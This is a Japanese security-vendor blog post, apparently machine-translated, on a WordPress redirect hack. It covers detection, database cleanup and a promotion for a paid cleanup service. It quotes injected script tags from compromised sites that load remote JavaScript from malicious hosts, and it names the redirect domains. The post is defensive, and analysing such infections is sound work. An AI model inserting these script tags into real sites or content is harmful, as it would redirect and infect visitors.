WordPress ブログから悪意のあるドメインにリダイレクトする訪問者?今すぐ解決

WordPress のリダイレクトハッキングは、これほど長い間脅威となってきました。それは、数週間ごとに新しいリダイレクトハッキングに変身します。私たちは、これらすべてのタイプの WordPress リダイレクトを随時カバーしてきました。リストに追加するのは、さらに別の WordPress リダイレクトハックタイプを明らかにするこのブログ投稿です。このハッキングは、ブログページの訪問者を悪意のあるドメインにリダイレクトします。

悪意のあるドメインには、adaranth.[com]、buyittraffic.[com]、cuttraffic.[com]、statistic[.]admarketlocation[.]com、 などがあります。 planeobservetoo1[.]ライブ など

感染しているかどうかを確認する方法

1.症状を観察する

一方的なドメインにリダイレクトする訪問者。
あなたのブログページの Google ランキングが低下しています。
違法なサイトの動作について、Google から警告メッセージを受け取っています。
あなたのウェブサイトはブラックリストに登録されています。これは、このブラックリストチェッカーツールで簡単に確認できます。
ウェブページのソースコードに悪意のあるリンクが含まれています。

ウェブサイトをスキャンしてブラックリストを探す
当社のツールは 65 以上のブラックリストをスキャンして、ウェブサイトがブラックリストに登録されているかどうかを確認します

上記の症状のいずれかに気付いた場合、あなたの Web サイトはハッキングされています。

WordPress ブログのリダイレクト?今すぐ修正してください!

2.マルウェアスキャナーでチェック

ハッキングを確認する別の方法は、マルウェアスキャナーで Web サイトをスキャンすることです。これには、オンラインのマルウェアスキャナーを使用できます。ウェブサイトの URL を入力して [スキャン] をクリックするだけです .

ハッキングの場所を特定する方法

ほとんどすべてのリダイレクトハッキングの背後には、データベースまたはコアファイルへの悪意のあるコードの挿入という同じ仕組みがあります。これも例外ではありません。

ハッキングを分析した結果、ハッカーが悪意のあるコードをデータベースに挿入したに違いないという結論を導き出しました。

ハッカーが wp_posts に JS コードを挿入した可能性が高いデータベースのテーブル (ウェブサイトのすべての投稿を含む)。

データベースを確認する方法は次のとおりです:

<オール>

PHPMyAdmin を使用してデータベースにアクセスします。

wp_posts に移動テーブル。リダイレクト投稿に移動し、投稿内で「adaranth.[com]」（またはその他の悪意のあるドメイン）を検索 (Ctrl + F) します。

悪意のあるコードの例:

<script src=“https://trafficpage.cool/addons/lnkr5.min.js” type=“text/javascript“></script><script src=“https://trafficpage.cool/addons/lnkr30_nt.min.js” type=“text/javascript“></script><script src=“https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x5953x&r=1536317274530” type=“text/javascript“></script>

ハッキングされた Web サイトで見つかった別の悪意のあるスクリプトは、次のようなものでした:

<script src=’https://dl.gotosecond2.com/clizkes' type=‘text/javascript’></script>

次に何をしますか?

感染をクリーンアップし、Web サイトを保護します。

マルウェアのクリーンアップを遅らせれば遅らせるほど、被害は大きくなります。 Astra の即時マルウェアクリーンアッププログラムを選択して、サインアップしたその日に Web サイトをクリーンアップしてください。 Astra によるプロのマルウェアクリーンアップを取得するには:

<オール>

Astra のマルウェアクリーンアッププログラムに登録する

サーバーの認証情報を更新してください。

当社のセキュリティエンジニアは、6 ～ 8 時間以内に、感染した Web サイトからすべての隠れたバックドアを駆除します。 Astra のハッカーでテストされたファイアウォールは、クリーンアップ後に Web サイトに展開され、将来このような攻撃から確実に保護されます。

結論

Web サイトがクリーンで完全に稼働したら、推奨される WordPress セキュリティのベストプラクティスに従って安全性を確保します。その一部:

ウェブサイトとサーバーのすべてのアカウントに強力なパスワードのみを作成して使用します。また、頻繁に変更してください。
デフォルトの管理 URL を変わったものに変更する
WordPress のファイルとフォルダの権限を正しく設定する
管理エリアを制限します。
ログイン試行などを制限する

プログラムまたは Astra について質問がありますか?私たちとチャットしましょう。

GDPR Cookie Consent プラグインに不適切なアクセス制御の脆弱性 |今すぐアップデート

PHP Pharma Hack:知っておくべきことすべて

WordPress Web サイトが buyittraffic[.com]、cuttraffic[.com]、puttraffic[.com] にリダイレクトされる - 今すぐ解決
WordPress サイトは、広範囲にわたるリダイレクトマルウェアの犠牲者になりました。多くの WordPress Web 所有者から、Web サイトのリダイレクトや管理パネルでエラーがスローされることを心配して連絡がありました。これらの Web サイトのクリーンアップを行っているときに、ハッキング方法に類似点を見つけることができました。これらの Web サイトはすべて、たまたま同じリダイレクトマルウェアに感染していました。このマルウェアはまず、buyittraffic[.com] という名前の悪意のあるドメインにリダイレクトし、最後に sinowncrers12 [.] live、
Google 検索および SERP 結果スパムからの偽の成人向け出会い系サイトのリダイレクト – WordPress、Magento、Joomla
Web サイトの訪問者が偽の成人向け出会い系サイトにリダイレクトされる、新しいタイプのリダイレクトマルウェアが出現しました。このマルウェアキャンペーンでは、何千もの偽のページが Web サイトに追加され、Google 検索によってインデックスに登録されます。 site: example.com で検索すると次のような結果が表示されます: このマルウェアキャンペーンは、エッセイ、薬局、出会い系サイト、ローン、メディア、悪意のあるダウンロードスパムサイトなどに偽のページとリダイレクトを追加することが知られています。関連ブログ – WordPress リダイレクトハック